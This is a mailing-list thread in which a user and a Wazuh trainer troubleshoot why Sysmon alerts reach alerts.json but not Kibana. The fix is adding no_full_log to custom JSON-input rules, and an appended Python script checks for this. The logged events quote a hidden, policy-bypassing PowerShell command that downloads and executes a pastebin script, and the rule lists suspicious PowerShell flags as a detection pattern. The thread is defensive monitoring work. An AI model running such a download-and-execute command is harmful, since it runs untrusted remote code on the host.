Sysmon


Miki Alkalay

Sep 19, 2019, 7:58:13 AM
to Wazuh mailing list
Hi Team,
I'm not getting any alert from Sysmon.
The alert is coming to the alert.log and I can see it.
On the GUI, no alert showed up.

The rule is set to level 12.

Please advise

Miki

Kevin Branch

Sep 19, 2019, 2:01:51 PM
to Miki Alkalay, Wazuh mailing list
What version of Wazuh manager and agent are you using?
What version of Sysmon and ElasticStack are  you using?
Do you really see no events when querying for the following from the standard Kibana Discover window, using a broad enough time window?
data.win.system.providerName:"Microsoft-Windows-Sysmon"
Please send a redacted version of the JSON record of the level 12 sysmon alert you mentioned, from your alerts.json file.
Also, what was the rule's id number?  If it is a custom rule, please send the rule, too.

Kevin


Miki Alkalay

Sep 19, 2019, 2:13:06 PM
to Kevin Branch, Wazuh mailing list
The local_rules file is working on other Wazuh systems.
See my answers after your questions:
What version of Wazuh manager and agent are you using? --> 3.9.5
What version of Sysmon and ElasticStack are you using? --> Sysmon version 10, and Elastic is the same version as in the installation guide for Wazuh 3.9.5
Do you really see no events when querying for the following from the standard Kibana Discover window, using a broad enough time window?
data.win.system.providerName:"Microsoft-Windows-Sysmon" --> I don't understand.
Please send a redacted version of the JSON record of the level 12 sysmon alert you mentioned, from your alerts.json file.
decoder: 'json'
       win.system.providerName: 'Microsoft-Windows-Sysmon'
       win.system.providerGuid: '{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'
       win.system.eventID: '1'
       win.system.version: '5'
       win.system.level: '4'
       win.system.task: '1'
       win.system.opcode: '0'
       win.system.keywords: '0x8000000000000000'
       win.system.systemTime: '2019-09-19T18:08:32.840263000Z'
       win.system.eventRecordID: '1653125'
       win.system.processID: '6772'
       win.system.threadID: '4732'
       win.system.channel: 'Microsoft-Windows-Sysmon/Operational'
       win.system.computer: 'DESKTOP-DCNJEUR'
       win.system.severityValue: 'INFORMATION'
       win.system.message: 'Process Create:'
       win.eventdata.utcTime: '2019-09-19 18:08:32.821'
       win.eventdata.processGuid: '{EFEF7267-C420-5D83-0000-0010C57DE625}'
       win.eventdata.processId: '28552'
       win.eventdata.image: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       win.eventdata.fileVersion: '10.0.17134.1 (WinBuild.160101.0800)'
       win.eventdata.description: 'Windows PowerShell'
       win.eventdata.product: 'Microsoft® Windows® Operating System'
       win.eventdata.company: 'Microsoft Corporation'
       win.eventdata.originalFileName: 'PowerShell.EXE'
       win.eventdata.commandLine: '"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”'
       win.eventdata.currentDirectory: 'C:\Windows\system32\WindowsPowerShell\v1.0\'
       win.eventdata.user: 'DESKTOP-DCNJEUR\miki'
       win.eventdata.logonGuid: '{EFEF7267-F0B8-5D70-0000-0020EE380300}'
       win.eventdata.logonId: '0x338ee'
       win.eventdata.terminalSessionId: '1'
       win.eventdata.integrityLevel: 'Medium'
       win.eventdata.hashes: 'MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677'
       win.eventdata.parentProcessGuid: '{EFEF7267-F0B9-5D70-0000-00105F4A0500}'
       win.eventdata.parentProcessId: '5196'
       win.eventdata.parentImage: 'C:\Windows\explorer.exe'
       win.eventdata.parentCommandLine: 'C:\Windows\Explorer.EXE'

Also, what was the rule's id number?  If it is a custom rule, please send the rule, too.
<rule id="255016" level="12">
    <if_sid>255000</if_sid>
    <field name="win.eventdata.commandline">EncodedCommand||-w hidden||-window hidden||-windowstyle hidden||-enc||-noni||noninteractive||iex||Invoke-Expression||bypass||unrestricted||administrator||criptBlockLogging||ScriptBlockInvocationLogging||LogPipelineExecutionDetails||ProtectedEventLogging</field>
    <description>Detects suspicious PowerShell invocation command parameters: $(win.eventdata.commandline)</description>
</rule>

--
Best Regards
Miki Alkalay
Mobile: 972-54-6496293

Kevin Branch

Sep 19, 2019, 2:55:37 PM
to Miki Alkalay, Wazuh mailing list
Hi Miki,

Related to my Kibana question, I was asking you to click on the Discover button on the upper left side of the Kibana window, somewhat below the "K" graphic.

Make sure you are pointed at the wazuh-alerts-3.x-* index pattern with a time window set that is broad enough to catch sysmon events you know have occurred.
Then paste the following into the search field and hit the search button
data.win.system.providerName:"Microsoft-Windows-Sysmon"  
Do you see any Sysmon-related alerts in response to that?

The record you sent me looks like it came from the output of ossec-logtest, not directly from alerts.json.   Please send a redacted version of the actual JSON record of the sysmon alert you mentioned, that wazuh-manager wrote to /var/ossec/logs/alerts/alerts.json.  Only that will confirm that the alert was actually generated by the manager.  

Kevin

Miki Alkalay

Sep 19, 2019, 3:14:17 PM
to Kevin Branch, Wazuh mailing list
tail -f /var/ossec/logs/alerts/alerts.json | grep miki
{"timestamp":"2019-09-19T22:13:06.241+0300","rule":{"level":12,"description":"PowerShell scripts that download content from the Internet: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”","id":"255011","firedtimes":1,"mail":true,"groups":["sysmon"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920386.45711818","full_log":"{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2019-09-19T19:13:02.724049800Z\",\"eventRecordID\":\"1653596\",\"processID\":\"6772\",\"threadID\":\"4732\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-DCNJEUR\",\"severityValue\":\"INFORMATION\",\"message\":\"Process Create:\"},\"eventdata\":{\"utcTime\":\"2019-09-19 19:13:02.715\",\"processGuid\":\"{EFEF7267-D33E-5D83-0000-00108B3F3426}\",\"processId\":\"27740\",\"image\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"fileVersion\":\"10.0.17134.1 (WinBuild.160101.0800)\",\"description\":\"Windows PowerShell\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"PowerShell.EXE\",\"commandLine\":\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\\\" -w hidden -ep bypass -nop -c “IEX ((New-Object 
System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”\",\"currentDirectory\":\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\\",\"user\":\"DESKTOP-DCNJEUR\\\\miki\",\"logonGuid\":\"{EFEF7267-F0B8-5D70-0000-0020EE380300}\",\"logonId\":\"0x338ee\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"Medium\",\"hashes\":\"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677\",\"parentProcessGuid\":\"{EFEF7267-F0B9-5D70-0000-00105F4A0500}\",\"parentProcessId\":\"5196\",\"parentImage\":\"C:\\\\Windows\\\\explorer.exe\",\"parentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\"}}}","decoder":{"name":"windows_eventchannel"},"data":{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2019-09-19T19:13:02.724049800Z","eventRecordID":"1653596","processID":"6772","threadID":"4732","channel":"Microsoft-Windows-Sysmon/Operational","computer":"DESKTOP-DCNJEUR","severityValue":"INFORMATION","message":"Process Create:"},"eventdata":{"utcTime":"2019-09-19 19:13:02.715","processGuid":"{EFEF7267-D33E-5D83-0000-00108B3F3426}","processId":"27740","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","fileVersion":"10.0.17134.1 (WinBuild.160101.0800)","description":"Windows PowerShell","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"PowerShell.EXE","commandLine":"\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object 
System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”","currentDirectory":"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\","user":"DESKTOP-DCNJEUR\\miki","logonGuid":"{EFEF7267-F0B8-5D70-0000-0020EE380300}","logonId":"0x338ee","terminalSessionId":"1","integrityLevel":"Medium","hashes":"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677","parentProcessGuid":"{EFEF7267-F0B9-5D70-0000-00105F4A0500}","parentProcessId":"5196","parentImage":"C:\\Windows\\explorer.exe","parentCommandLine":"C:\\Windows\\Explorer.EXE"}}},"location":"EventChannel"}
{"timestamp":"2019-09-19T22:13:09.224+0300","rule":{"level":5,"description":"Windows error event.","id":"18103","firedtimes":7,"mail":false,"groups":["windows","system_error"],"gpg13":["4.3"],"gdpr":["IV_35.7.d"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920389.45715698","full_log":"2019 Sep 19 22:13:03 WinEvtLog: Application: ERROR(1000): Application Error: (no user): no domain: DESKTOP-DCNJEUR: Faulting application name: PowerShell.exe, version: 10.0.17134.1, time stamp: 0x05e7290f  Faulting module name: bcryptPrimitives.dll, version: 10.0.17134.950, time stamp: 0xb13b6b13  Exception code: 0xc0000005  Fault offset: 0x000000000000d2b5  Faulting process id: 0x6c5c  Faulting application start time: 0x01d56f1e422b9c3b  Faulting application path: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe  Faulting module path: C:\\Windows\\System32\\bcryptPrimitives.dll  Report Id: 7aed6d89-80e8-431d-a540-6a68a5debf81  Faulting package full name: ?  Faulting package-relative application ID: ?  ","predecoder":{"program_name":"WinEvtLog","timestamp":"2019 Sep 19 22:13:03"},"decoder":{"parent":"windows","name":"windows"},"data":{"dstuser":"(no user)","id":"1000","status":"ERROR","data":"Application Error","system_name":"DESKTOP-DCNJEUR","type":"Application"},"location":"WinEvtLog"}

Kevin Branch

Sep 19, 2019, 4:22:49 PM
to Miki Alkalay, Wazuh mailing list
Hi Miki,

Thanks for the details.  So ossec-analysisd is definitely correctly matching rule 255016 and generating an alert that is written as a JSON record to /var/ossec/logs/alerts/alerts.json.  That is good.

I believe the problem is that your custom Sysmon rule has no "no_full_log" option set, which at this time is needed to work around a Wazuh issue preventing alerts.json JSON record insertion into Elasticsearch when the full_log field consists of a JSON record of its own.
Please note that ANY local_rules file you include that involves JSON input, like Windows Eventchannel events, must have the "no_full_log" option set on all such rules, or the alert records for those rules will not actually be inserted into Elasticsearch.

Change your rule to look like this and then restart the wazuh-manager service:

<rule id="255016" level="12">
        <if_sid>255000</if_sid>
        <field name="win.eventdata.commandline">EncodedCommand||-w hidden||-window hidden||-windowstyle hidden||-enc||-noni||noninteractive||iex||Invoke-Expression||bypass||unrestricted||administrator||criptBlockLogging||ScriptBlockInvocationLogging||LogPipelineExecutionDetails||ProtectedEventLogging</field>
        <description>Detects suspicious PowerShell invocation command parameters: $(win.eventdata.commandline)</description>
        <options>no_full_log</options>
</rule>


See that your expanded alert JSON record below presently contains a full_log field that itself contains a nested JSON record.  That is what must be stripped out via the no_full_log option at this time.

{

Kevin Branch
Wazuh Trainer

Miki Alkalay

Sep 19, 2019, 4:32:54 PM
to Kevin Branch, Wazuh mailing list
Hi,
It worked.
Thanks, so it wasn't needed in previous versions.
Should I put <options>no_full_log</options> on all rules?

Thanks
Miki

Kevin Branch

Sep 20, 2019, 3:40:58 PM
to Miki Alkalay, Wazuh mailing list
You are welcome, Miki.  To my knowledge, no_full_log is only needed on rules based on JSON input, with Windows event channel being the biggest example.  If you happen to consume JSON logs from Suricata or Snort, that would be another example of JSON input into Wazuh.
Also, I am under the impression this is a temporary situation and that eventually we'll be able to optionally store full_log JSON content without conflict.  I have not yet tried this with the new 3.10 though.

Kevin
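Two checks that follow from Kevin's explanation in this thread, written as an added example (not code from the thread or from the Wazuh project): one scans alerts.json lines for records whose full_log string is itself a JSON document, the shape he says blocks insertion into Elasticsearch, and reports the rule ids that produced them; the other parses a local_rules.xml fragment and lists rules that lack the no_full_log option. The sample alert lines and the rule fragment are constructed for the example; rule id 255017 is hypothetical, and the real file paths in the comments are assumed to be the usual Wazuh 3.x locations.

```python
import json
import xml.etree.ElementTree as ET

# Constructed sample alerts.json lines (not the thread's real records): one
# Sysmon alert whose full_log is a JSON document of its own, and one classic
# WinEvtLog alert whose full_log is plain text.
SAMPLE_ALERTS = [
    json.dumps({
        "timestamp": "2019-09-19T22:13:06.241+0300",
        "rule": {"level": 12, "id": "255016", "groups": ["sysmon"],
                 "description": "Suspicious PowerShell invocation"},
        "agent": {"id": "044", "name": "example-agent"},
        "full_log": json.dumps({"win": {
            "system": {"providerName": "Microsoft-Windows-Sysmon", "eventID": "1"},
            "eventdata": {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}}}),
        "decoder": {"name": "windows_eventchannel"},
        "location": "EventChannel",
    }),
    json.dumps({
        "timestamp": "2019-09-19T22:13:09.224+0300",
        "rule": {"level": 5, "id": "18103", "groups": ["windows", "system_error"],
                 "description": "Windows error event."},
        "agent": {"id": "044", "name": "example-agent"},
        "full_log": "2019 Sep 19 22:13:03 WinEvtLog: Application: ERROR(1000): Application Error",
        "decoder": {"name": "windows"},
        "location": "WinEvtLog",
    }),
]

# Constructed local_rules.xml fragment: rule 255016 as posted in the thread
# (with a shortened pattern list) plus a hypothetical rule 255017 that already
# carries the option.
SAMPLE_RULES = """<group name="sysmon,">
  <rule id="255016" level="12">
    <if_sid>255000</if_sid>
    <field name="win.eventdata.commandline">-w hidden||-enc||bypass</field>
    <description>Detects suspicious PowerShell invocation command parameters</description>
  </rule>
  <rule id="255017" level="12">
    <if_sid>255000</if_sid>
    <field name="win.eventdata.image">powershell.exe</field>
    <description>Hypothetical second Sysmon rule</description>
    <options>no_full_log</options>
  </rule>
</group>"""


def full_log_is_json(alert):
    """True when the alert's full_log is a string that parses to a JSON object."""
    full_log = alert.get("full_log")
    if not isinstance(full_log, str):
        return False
    try:
        return isinstance(json.loads(full_log), dict)
    except ValueError:
        return False


def find_nested_full_log_rules(lines):
    """Map rule id -> number of alerts whose full_log is a nested JSON record.
    Lines that are not complete JSON (for example, read while the manager is
    still writing them) are skipped rather than treated as errors."""
    hits = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            alert = json.loads(line)
        except ValueError:
            continue
        if full_log_is_json(alert):
            rule_id = alert.get("rule", {}).get("id", "?")
            hits[rule_id] = hits.get(rule_id, 0) + 1
    return hits


def rules_missing_no_full_log(rules_xml):
    """Return ids of <rule> elements that have no no_full_log option.
    The text is wrapped in a dummy root because a rules file may contain several
    top-level <group> elements; multiple <options> elements per rule and
    comma-separated option lists are both accepted."""
    root = ET.fromstring("<root>" + rules_xml + "</root>")
    missing = []
    for rule in root.iter("rule"):
        options = set()
        for opt in rule.findall("options"):
            options.update((opt.text or "").replace(",", " ").split())
        if "no_full_log" not in options:
            missing.append(rule.get("id"))
    return missing


if __name__ == "__main__":
    # On a manager (assumed Wazuh 3.x paths), replace the samples with e.g.
    #   find_nested_full_log_rules(open("/var/ossec/logs/alerts/alerts.json"))
    #   rules_missing_no_full_log(open("/var/ossec/etc/rules/local_rules.xml").read())
    for rule_id, count in find_nested_full_log_rules(SAMPLE_ALERTS).items():
        print(f"rule {rule_id}: {count} alert(s) with a nested JSON full_log")
    for rule_id in rules_missing_no_full_log(SAMPLE_RULES):
        print(f"rule {rule_id} lacks <options>no_full_log</options>")
```

Run against the real alerts.json, the first function tells you which rule ids are producing records Kibana will never show; run against local_rules.xml, the second lists the rules still needing the option, which covers Suricata or Snort JSON rules as well as Windows event channel ones.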